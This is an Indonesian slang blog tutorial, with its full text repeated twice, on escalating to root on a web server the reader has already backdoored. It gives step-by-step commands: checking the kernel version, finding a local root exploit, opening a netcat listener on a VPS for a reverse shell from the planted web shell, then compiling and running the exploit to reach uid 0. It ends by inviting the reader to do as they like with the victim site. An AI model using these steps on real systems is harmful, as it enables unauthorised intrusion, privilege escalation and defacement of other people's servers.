Tutorial Root Server Back Connect
Cara Back Connect Root Server
Hey Welcome Back Gannn
Yoyoyo mannn
Perkenalkan Mimin Tergans Tn.Infinity
Kali ini Gw akan share tutorial Back Connect Root Server
Klean pasti pernah Nemu web yang pas upshell eh ternyata red dir smua:v
GK ush khawatir gan,karena bisa ditanggulangi kok yah asw
Ok GK ush basa basi lgsung ke tutor
Bahan:
Localroot
VPS
Akses Shell ( Yang Udah ditanem di web korban )
Langkah pertama kita cek versi kernel web nya berapa dengan cara ketik:
uname -a
di fitur command yang ada di Shell backdoor klean
Nah kalau muncul versi kernel dibawah 2016 berarti bisa root Server yah su:v
Langkah kedua kita cari localroot nya dengan cara cari di exploit-db.com atau lgsung Dorking aja juga bisa kok:v
Kalau udh ketemu localroot nya kita upload localroot nya di dir yang writeable (hijau)
( Jangan lupa mampir ke video terbaru YouTube FCA yah https://youtu.be/VzxCgxBN1Tc )
Setelah itu Kalian Login VPS
Kalau Linux bisa lgsung pake terminal ketik:
ssh username@ipserver
Kalau windows bisa pakai putty
Langkah selanjutnya kita back connect
Ketik command:
nc -l 1337
Selanjutnya pilih fitur netsploit di Shell backdoor klean ,pada menu backconnect masukkan IP VPS dan port yang tadi lalu klik backconnect
Kalau sudah ,bakalan muncul uid gid dan groups
Lalu masuk ke dir yang tempat kalian upload localroot yang tadi
Jika localroot nya masih berekstensi .c
localroot.c maka compile dulu dengan ketik di command prompt:
gcc localroot.c -o shell
chmod 777 shell
./shell
Sampai muncul tulisan
sh: no job control in this shell
sh-3.1#
Ketik id maka akan muncul
uid=0(root) gid=0(root) groups=98(nobody)
Lalu cek Shell backdoor klean
Dan boomm.....
Dir rednya berubah menjadi hijau
Dan lalu terserah kalian mau apain tuh web kalau mau nebas backup dulu yah asu:v
Oke Thanks Udah Mampir
Hey Welcome Back Gannn
Yoyoyo mannn
Perkenalkan Mimin Tergans Tn.Infinity
Kali ini Gw akan share tutorial Back Connect Root Server
Klean pasti pernah Nemu web yang pas upshell eh ternyata red dir smua:v
GK ush khawatir gan,karena bisa ditanggulangi kok yah asw
Ok GK ush basa basi lgsung ke tutor
Bahan:
Localroot
VPS
Akses Shell ( Yang Udah ditanem di web korban )
Langkah pertama kita cek versi kernel web nya berapa dengan cara ketik:
uname -a
di fitur command yang ada di Shell backdoor klean
Nah kalau muncul versi kernel dibawah 2016 berarti bisa root Server yah su:v
Langkah kedua kita cari localroot nya dengan cara cari di exploit-db.com atau lgsung Dorking aja juga bisa kok:v
Kalau udh ketemu localroot nya kita upload localroot nya di dir yang writeable (hijau)
( Jangan lupa mampir ke video terbaru YouTube FCA yah https://youtu.be/VzxCgxBN1Tc )
Setelah itu Kalian Login VPS
Kalau Linux bisa lgsung pake terminal ketik:
ssh username@ipserver
Kalau windows bisa pakai putty
Langkah selanjutnya kita back connect
Ketik command:
nc -l 1337
Selanjutnya pilih fitur netsploit di Shell backdoor klean ,pada menu backconnect masukkan IP VPS dan port yang tadi lalu klik backconnect
Kalau sudah ,bakalan muncul uid gid dan groups
Lalu masuk ke dir yang tempat kalian upload localroot yang tadi
Jika localroot nya masih berekstensi .c
localroot.c maka compile dulu dengan ketik di command prompt:
gcc localroot.c -o shell
chmod 777 shell
./shell
Sampai muncul tulisan
sh: no job control in this shell
sh-3.1#
Ketik id maka akan muncul
uid=0(root) gid=0(root) groups=98(nobody)
Lalu cek Shell backdoor klean
Dan boomm.....
Dir rednya berubah menjadi hijau
Dan lalu terserah kalian mau apain tuh web kalau mau nebas backup dulu yah asu:v
Oke Thanks Udah Mampir